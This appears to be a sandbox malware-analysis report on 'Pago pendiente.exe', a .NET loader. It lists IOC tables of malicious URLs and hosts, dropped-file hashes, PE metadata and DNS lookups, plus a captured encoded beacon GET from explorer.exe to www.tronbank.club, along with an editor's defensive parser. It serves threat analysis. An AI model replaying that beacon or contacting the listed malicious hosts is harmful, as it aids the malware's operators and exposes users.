AMAZONEXPANSIONGB | https://www.ticketlike.fun/ | malicious | Unknown | 3.33.220.150
AMAZONEXPANSIONGB | Bank Details.pdf.exe | malicious | FormBook | 3.33.130.190
AMAZONEXPANSIONGB | tajma.arm7-20240422-0539.elf | malicious | Mirai, Okiru | 52.223.58.75
AMAZONEXPANSIONGB | https://insight.adsrvr.org/track/clk?imp=df287ca2-348e-4ef4-95b6-18b097ff396b&ag=p58m9rx&sfe=18153e0c&sig=bucGwjsT0boMqfapF3ys659iHXd10oU-bjV9b6_4Zeo.&crid=6kt8s54g&cf=6336093&fq=0&t=1&td_s=sourceforge.net&rcats=7sp&mste=&mfld=4&mssi=&mfsi=&sv=federatedmedia&uhow=50&agsa=&wp=1.092081&rgz=V6B&dt=PC&osf=Windows&os=Windows10&br=Chrome&svpid=223717&rlangs=en&mlang=&did=&rcxt=Other&tmpc=13.78000000000003&vrtd=&osi=&osv=&daid=&dnr=0&vpb=&c=CgZDYW5hZGESEEJyaXRpc2ggQ29sdW1iaWEaACIJVmFuY291dmVyOAFQAYABAYgBAZABAbABALoBBgih4gMYDJICBjM2NDY0ONgCiA7gAogO-AIBgAMCiAMDkAMBmAMEoAM9uAPBygbCAxQH24iSXx67EhZUq4XVXDtGqPPXTQ..&dur=CiMKDmNoYXJnZS1hbGwtMTIyIhEIhv__________ARIEaWF2MgpjCgc3dWluZTd4EJimBSIXCJey-qABEg9kYTkyMzI5YXVkaWdlbnQiOwiXsvqgARINZHIxMTNhdWRpZ2VudEIkOWYzZDAzYWMtOGI0MC00YmNlLTk0N2ItZDczYTFiZjNkNjZmCj4KIWNoYXJnZS1tYXhEb3VibGVWZXJpZnlCcmFuZFNhZmV0eSIZCPH__________wESDGRvdWJsZXZlcmlmeQowCgxjaGFyZ2UtYWxsLTEiIAj___________8BEhN0dGRfZGF0YV9leGNsdXNpb25zEJimBTIkOWYzZDAzYWMtOGI0MC00YmNlLTk0N2ItZDczYTFiZjNkNjZmOAE.&durs=L4Cb61&crrelr=&npt=&testid=iavc1%20&fpa=546&pcm=3&ict=Unknown&said=d25d7c3f-8a89-4349-b8cc-15f285ed17c0&auct=1&tail=1&r=https://cf-ipfs.com/ipfs/QmW3CaJMeTL4Z1WhsR8kFQWUND47rYZXMSNdwezX7aMqJs/#assetcoordinator@bluestarindia.com | malicious | HTMLPhisher | 3.33.220.150
AMAZONEXPANSIONGB | https://19apmic17.z13.web.core.windows.net/ | malicious | TechSupportScam | 3.33.220.150
AMAZONEXPANSIONGB | https://19apmic11.z13.web.core.windows.net/ | malicious | TechSupportScam | 3.33.220.150
AMAZONEXPANSIONGB | FFE Order details - Cincy v41720.xlsx | malicious | Unknown | 3.33.220.150
AMAZONEXPANSIONGB | FFE Order details - Cincy v41720.xlsx | malicious | Unknown | 3.33.220.150
UNMETEREDCA | v6SEx6rJ3E.exe | malicious | LummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, Stealc, Vidar | 38.147.122.254
UNMETEREDCA | file.exe | malicious | RedLine, SmokeLoader | 38.147.122.253
UNMETEREDCA | SecuriteInfo.com.FileRepMalware.4269.6620.exe | malicious | Unknown | 154.12.35.37
UNMETEREDCA | ckS92jgGGm.elf | malicious | Mirai | 38.147.250.143
UNMETEREDCA | VFSJUqK11j.elf | malicious | Mirai | 38.147.22.98
UNMETEREDCA | uCEcm0sVMK.elf | malicious | Mirai | 38.147.202.241
UNMETEREDCA | Fr2X6xwNNK.elf | malicious | Unknown | 38.147.26.128
UNMETEREDCA | S2So6J38N6.elf | malicious | Mirai | 154.12.57.120
UNMETEREDCA | Q017PzM46q.elf | malicious | Mirai | 154.12.57.120
UNMETEREDCA | R3jiSIIDrx.elf | malicious | Mirai | 154.12.57.120
TRELLIAN-AS-APTrellianPtyLimitedAU | http://husbeu.com/jr.php?gz=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%3D%3D&vs=1920:945&ds=1920:1080&sl=1:1&os=f&nos=f&if=f&sc=f&gpu=Google%20Inc.%20(Google)%20-%20ANGLE%20(Google,%20Vulkan%201.3.0%20(SwiftShader%20Device%20(Subzero)%20(0x0000C0DE)),%20SwiftShader%20driver)&anura_res= | malicious | Unknown | 103.224.182.206
TRELLIAN-AS-APTrellianPtyLimitedAU | 615.exe | malicious | NetWire | 103.224.212.210
TRELLIAN-AS-APTrellianPtyLimitedAU | http://www.outdooradventuresinc.com | malicious | Unknown | 103.224.182.238
TRELLIAN-AS-APTrellianPtyLimitedAU | https://rxplusmart.su/ | malicious | Unknown | 103.224.212.214
TRELLIAN-AS-APTrellianPtyLimitedAU | http://www.outdooradventuresinc.com | malicious | Unknown | 103.224.182.238
TRELLIAN-AS-APTrellianPtyLimitedAU | HTTP://PEPJOB.COM/JOBSEEKERS/TOOLS/VALUESTEST.HTM | malicious | Unknown | 103.224.182.240
TRELLIAN-AS-APTrellianPtyLimitedAU | Dokument-99373.exe | malicious | FormBook, PureLog Stealer | 103.224.212.217
TRELLIAN-AS-APTrellianPtyLimitedAU | http://pepjob.com/jobseekers/tools/valuestest.htm | malicious | Unknown | 103.224.182.240
TRELLIAN-AS-APTrellianPtyLimitedAU | http://engcabs.com | malicious | Unknown | 103.224.182.242
TRELLIAN-AS-APTrellianPtyLimitedAU | http://rfq.engcabs.com | malicious | Unknown | 103.224.182.242

ASN-level overlap is the weakest pivot in this section: AMAZONEXPANSIONGB is Amazon address space and TRELLIAN-AS-AP belongs to a domain-parking operator, so the rows above mostly say that unrelated samples (tech-support scams, Mirai, stealers) also touched cloud-hosted or parked hosts in the same networks. Treat the individual IPs as indicators only where a domain- or URL-level match backs them up.
                                                        No context
                                                        No context
                                                        Process:C:\Users\user\Desktop\Pago pendiente.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1415
                                                        Entropy (8bit):5.352427679901606
                                                        Encrypted:false
                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRuAE4KzecKIE4oKNzKorE4x84j:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectP
                                                        MD5:3978978DE913FD1C068312697D6E5917
                                                        SHA1:1DABBE7FB8F38F6EBF474CE5F0ECAA89F48E2538
                                                        SHA-256:33B7B1668DDD3AB39711F9F93B667F6F2F674348A79228BFA163BA625B37F120
                                                        SHA-512:78694B97F5D03758F503155E5CE5B85AABDF9690F0DFBC51FCE9926BE2D86BCF99E008659420F1E8489A7F6EA125F2776D4C6DC4B151566B529454512352953D
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"
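The dropped file above, written by the sample's own process, has the row layout of the CLR's per-executable usage log (the assembly-binding record the .NET runtime appends under its CLR_v4.0_32\UsageLogs directory so that auto-NGen knows what a program loads); the report does not show the file's path, so that identification is this editor's reading of the preview, not a statement from the report. For an analyst it is evidence that the .NET stage actually executed as this user and a list of what it bound before handing off. The parser below is an added example, not Joe Sandbox code. Its input is the preview text with the report's ".." rendering of CRLF put back (the final System.Xml row is kept exactly as truncated in the preview), and the meaning it assigns to the leading record number (2 = assembly bound as IL, 3 = assembly bound through the NGen native image named in the third field) is inferred from these rows rather than taken from a documented format.

```python
import csv
from pathlib import PureWindowsPath

# Constructed sample input: the preview of the dropped file above, CRLF restored.
# The last row is truncated exactly as the report's preview truncates it.
USAGE_LOG = "\r\n".join([
    '1,"fusion","GAC",0',
    '1,"WinRT","NotApp",1',
    '2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0',
    '3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\920e3d1d70447c3c10e69e6df0766568\\System.ni.dll",0',
    '2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0',
    '3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\8b2c1203fd20aea8260bfbc518004720\\System.Core.ni.dll",0',
    '3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Data\\1b8c564fd69668e6e62d136259980d9e\\System.Data.ni.dll",0',
    '3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\2062ed810929ec0e33254c02b0c61bb4\\System.Xml.ni.dll"',
])

# Assumed meaning of the leading record number, inferred from the rows above
# (not a documented format): 2 = assembly bound as IL, no native image;
# 3 = assembly bound through an NGen native image whose path is field 3.
BOUND_IL, BOUND_NATIVE = "2", "3"

# Framework native images live under the Windows assembly store; an image
# bound from anywhere else is a dependency the sample brought with it.
FRAMEWORK_NATIVE_ROOT = PureWindowsPath(r"C:\Windows\assembly")


def parse_usage_log(text):
    """Yield one record per bound assembly: short name, full display name and
    the native-image path (None when the assembly was bound as IL)."""
    # csv handles the quoted display names, which themselves contain commas.
    for row in csv.reader(text.splitlines()):
        if len(row) < 3 or row[0] not in (BOUND_IL, BOUND_NATIVE):
            continue  # '1' rows are loader flags, anything else is noise
        short_name = row[1].split(",", 1)[0].strip()
        native = row[2] if row[0] == BOUND_NATIVE else None
        yield {"assembly": short_name, "display_name": row[1], "native_image": native}


def bound_assemblies(text):
    """Short names, in bind order, of every assembly the program loaded."""
    return [r["assembly"] for r in parse_usage_log(text)]


def images_outside_framework(text):
    """Native-image paths outside the Windows assembly store: the ones worth a look."""
    suspicious = []
    for r in parse_usage_log(text):
        if r["native_image"] is None:
            continue
        if FRAMEWORK_NATIVE_ROOT not in PureWindowsPath(r["native_image"]).parents:
            suspicious.append(r["native_image"])
    return suspicious


if __name__ == "__main__":
    print("bound:", ", ".join(bound_assemblies(USAGE_LOG)))
    print("non-framework native images:", images_outside_framework(USAGE_LOG) or "none")
```

For this sample every bound assembly is a framework one, which is the usual footprint of an obfuscated .NET loader that only needs WinForms, Drawing, Core, Data and Xml to decode and launch its embedded payload; a native image under a user-writable path in such a log would instead point at a dropped dependency to collect.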

(The next file is binary housekeeping written by powershell.exe: its preview consists of PowerShell's own assembly names. It is not payload; it records that PowerShell ran.)
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1172
                                                        Entropy (8bit):5.357042452875322
                                                        Encrypted:false
                                                        SSDEEP:24:3CytZWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:yyjWSU4y4RQmFoUeWmfmZ9tK8NDE
                                                        MD5:475D428E7231D005EEA5DB556DBED03F
                                                        SHA1:3D603ED4280E0017D1BEB124D68183F8283B5C22
                                                        SHA-256:1314488A930843A7E1A003F2E7C1D883DB44ADEC26AC1CA096FE8DC1B4B180F5
                                                        SHA-512:7181BDCE6DA8DA8AFD3A973BB2B0BA470468EFF32FFB338DB2662FEFA1A7848ACD87C319706B95401EA18DC873CA098DC722EA6F8B2FD04F1AABD2AEBEA97CF9
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

(The four 60-byte files that follow are the probe script PowerShell writes at every start to test whether AppLocker is enforcing a lockdown policy. Their content is benign and identical; their only value here is as evidence that powershell.exe was launched during the analysis.)
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):7.93284965265028 (close to the 8.0 ceiling, so most of the file is compressed or encrypted data rather than code)
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        File name:Pago pendiente.exe
                                                        File size:624'640 bytes
                                                        MD5:9a308e1ea62b7ede8876e433178957d1
                                                        SHA1:dac00f0068f3f97a71faf15577ce0c7d855ff691
                                                        SHA256:ae300b28b2240d11d01e9066a26a88349258d4016c41460604c9ff5bb64c9b6d
                                                        SHA512:6bd4ac59b7f6f1a49ce9150507dcb2fee3292e4286b76f2954bf08492bce21ebf1ac93be1e1c0e267cfea9d16fd45188bc5e2894f17926f1ad67d6a0fc75e07a
                                                        SSDEEP:12288:6SnBB6f5+Zq7aXVZm/1u2eo45hx5BEW3piNHmbWW66T5Lp:6uB60q7yVYeD5hx5npgmbT66Tn
                                                        TLSH:5BD4121835563F95E03FABB5543A652003B1A57DF631E6EEDFC220D72C21F809A62B27
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R.'f.................~............... ........@.. ....................................@................................
                                                        Icon Hash:00928e8e8686b000
                                                        Entrypoint:0x499d8e
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x66279E52 [Tue Apr 23 11:41:06 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744 (the import hash shared by practically every .NET executable, whose only native import is mscoree!_CorExeMain; it confirms the file is a managed assembly but is useless for pivoting to related samples)
Instruction
jmp dword ptr [00402000h]
(followed by 82 repetitions of "add byte ptr [eax], al", which is how the disassembler renders the 00 00 padding bytes after the stub; there is no further native code at the entry point)

The six-byte jmp through the import address table entry at 0x402000 is the standard native entry stub of a 32-bit .NET executable: it lands in mscoree!_CorExeMain, which starts the CLR and then runs the managed entry point. Nothing about this sample's behaviour is visible in native code here; all of it lives in the managed code that this stub hands control to.
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x99d40 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x9a000 | 0x600 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x9c000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x97d94 | 0x97e00 | 34b7125ee61a3bdf564624f315cff97e | False | 0.95473733281893 | data | 7.9402587845762955 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x9a000 | 0x600 | 0x600 | 4805845c124c5811cc5ac75858cb0c76 | False | 0.423828125 | data | 4.1134333382521575 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x9c000 | 0xc | 0x200 | f6503e8d8cef9b0e5808b5f8dee3290a | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x9a090 | 0x32c | data | | | 0.4273399014778325
RT_MANIFEST | 0x9a3cc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 23, 2024 14:20:34.506072998 CEST | 192.168.2.5 | 1.1.1.1 | 0x8c2a | Standard query (0) | www.tronbank.club | A (IP address) | IN (0x0001) | false
Apr 23, 2024 14:20:55.410773993 CEST | 192.168.2.5 | 1.1.1.1 | 0xdf78 | Standard query (0) | www.signomo.com | A (IP address) | IN (0x0001) | false
Apr 23, 2024 14:21:15.895008087 CEST | 192.168.2.5 | 1.1.1.1 | 0xa89 | Standard query (0) | www.urxetqt.com | A (IP address) | IN (0x0001) | false
Apr 23, 2024 14:21:56.863759995 CEST | 192.168.2.5 | 1.1.1.1 | 0x33d6 | Standard query (0) | www.airzf.com | A (IP address) | IN (0x0001) | false
Apr 23, 2024 14:21:57.881844997 CEST | 192.168.2.5 | 1.1.1.1 | 0x33d6 | Standard query (0) | www.airzf.com | A (IP address) | IN (0x0001) | false
Apr 23, 2024 14:22:18.223465919 CEST | 192.168.2.5 | 1.1.1.1 | 0x3145 | Standard query (0) | www.actnowgreen.com | A (IP address) | IN (0x0001) | false
Apr 23, 2024 14:22:38.726823092 CEST | 192.168.2.5 | 1.1.1.1 | 0xad70 | Standard query (0) | www.udin88b.us | A (IP address) | IN (0x0001) | false
Apr 23, 2024 14:22:59.130279064 CEST | 192.168.2.5 | 1.1.1.1 | 0x8c9c | Standard query (0) | www.eternalknot1008.com | A (IP address) | IN (0x0001) | false
Apr 23, 2024 14:23:20.792583942 CEST | 192.168.2.5 | 1.1.1.1 | 0x7a09 | Standard query (0) | www.zgcple.info | A (IP address) | IN (0x0001) | false
Apr 23, 2024 14:23:41.192565918 CEST | 192.168.2.5 | 1.1.1.1 | 0x2ded | Standard query (0) | www.k2securityhn.com | A (IP address) | IN (0x0001) | false
Apr 23, 2024 14:24:03.040910959 CEST | 192.168.2.5 | 1.1.1.1 | 0xf233 | Standard query (0) | www.wonderdread.cloud | A (IP address) | IN (0x0001) | false
Apr 23, 2024 14:24:23.816865921 CEST | 192.168.2.5 | 1.1.1.1 | 0xedc8 | Standard query (0) | www.umastyle.club | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 23, 2024 14:20:35.009041071 CEST | 1.1.1.1 | 192.168.2.5 | 0x8c2a | No error (0) | www.tronbank.club | | 103.224.212.216 | A (IP address) | IN (0x0001) | false
Apr 23, 2024 14:20:55.668734074 CEST | 1.1.1.1 | 192.168.2.5 | 0xdf78 | No error (0) | www.signomo.com | signomo.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 23, 2024 14:20:55.668734074 CEST | 1.1.1.1 | 192.168.2.5 | 0xdf78 | No error (0) | signomo.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Apr 23, 2024 14:20:55.668734074 CEST | 1.1.1.1 | 192.168.2.5 | 0xdf78 | No error (0) | signomo.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Apr 23, 2024 14:21:16.002420902 CEST | 1.1.1.1 | 192.168.2.5 | 0xa89 | Name error (3) | www.urxetqt.com | none | none | A (IP address) | IN (0x0001) | false
Apr 23, 2024 14:21:58.590172052 CEST | 1.1.1.1 | 192.168.2.5 | 0x33d6 | No error (0) | www.airzf.com | | 154.12.38.29 | A (IP address) | IN (0x0001) | false
Apr 23, 2024 14:21:58.590213060 CEST | 1.1.1.1 | 192.168.2.5 | 0x33d6 | No error (0) | www.airzf.com | | 154.12.38.29 | A (IP address) | IN (0x0001) | false
Apr 23, 2024 14:22:18.342899084 CEST | 1.1.1.1 | 192.168.2.5 | 0x3145 | Name error (3) | www.actnowgreen.com | none | none | A (IP address) | IN (0x0001) | false
Apr 23, 2024 14:22:38.864809990 CEST | 1.1.1.1 | 192.168.2.5 | 0xad70 | No error (0) | www.udin88b.us | | 154.83.2.141 | A (IP address) | IN (0x0001) | false
Apr 23, 2024 14:22:38.864809990 CEST | 1.1.1.1 | 192.168.2.5 | 0xad70 | No error (0) | www.udin88b.us | | 154.83.2.115 | A (IP address) | IN (0x0001) | false
Apr 23, 2024 14:22:59.299431086 CEST | 1.1.1.1 | 192.168.2.5 | 0x8c9c | No error (0) | www.eternalknot1008.com | d876e8-a4.myshopify.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 23, 2024 14:22:59.299431086 CEST | 1.1.1.1 | 192.168.2.5 | 0x8c9c | No error (0) | d876e8-a4.myshopify.com | shops.myshopify.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 23, 2024 14:22:59.299431086 CEST | 1.1.1.1 | 192.168.2.5 | 0x8c9c | No error (0) | shops.myshopify.com | | 23.227.38.74 | A (IP address) | IN (0x0001) | false
Apr 23, 2024 14:23:20.940700054 CEST | 1.1.1.1 | 192.168.2.5 | 0x7a09 | Name error (3) | www.zgcple.info | none | none | A (IP address) | IN (0x0001) | false
Apr 23, 2024 14:23:41.397124052 CEST | 1.1.1.1 | 192.168.2.5 | 0x2ded | No error (0) | www.k2securityhn.com | k2securityhn.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 23, 2024 14:23:41.397124052 CEST | 1.1.1.1 | 192.168.2.5 | 0x2ded | No error (0) | k2securityhn.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Apr 23, 2024 14:23:41.397124052 CEST | 1.1.1.1 | 192.168.2.5 | 0x2ded | No error (0) | k2securityhn.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Apr 23, 2024 14:24:03.240576982 CEST | 1.1.1.1 | 192.168.2.5 | 0xf233 | No error (0) | www.wonderdread.cloud | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 23, 2024 14:24:03.240576982 CEST | 1.1.1.1 | 192.168.2.5 | 0xf233 | No error (0) | parkingpage.namecheap.com | | 91.195.240.19 | A (IP address) | IN (0x0001) | false
Apr 23, 2024 14:24:24.044819117 CEST | 1.1.1.1 | 192.168.2.5 | 0xedc8 | No error (0) | www.umastyle.club | | 103.224.212.210 | A (IP address) | IN (0x0001) | false
                                                        • www.tronbank.club
                                                        • www.signomo.com
                                                        • www.airzf.com
                                                        • www.k2securityhn.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49717 | 103.224.212.216 | 80 | 1028 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Apr 23, 2024 14:20:35.162353039 CEST | 158 | OUT | GET /gs12/?4h0=l5+ohMyXvfUY1BXURi/VBBPK89EwzQ1xmTW49ppdAXwminvYBxYYysXiCF4Xd1c73Byq&vT=LtxxLba HTTP/1.1
Host: www.tronbank.club
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 23, 2024 14:20:35.358288050 CEST | 422 | IN | HTTP/1.1 302 Found
date: Tue, 23 Apr 2024 12:20:35 GMT
server: Apache
set-cookie: __tad=1713874835.4057426; expires=Fri, 21-Apr-2034 12:20:35 GMT; Max-Age=315360000
location: http://ww25.tronbank.club/gs12/?4h0=l5+ohMyXvfUY1BXURi/VBBPK89EwzQ1xmTW49ppdAXwminvYBxYYysXiCF4Xd1c73Byq&vT=LtxxLba&subid1=20240423-2220-3536-b2ed-03f98b483855
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
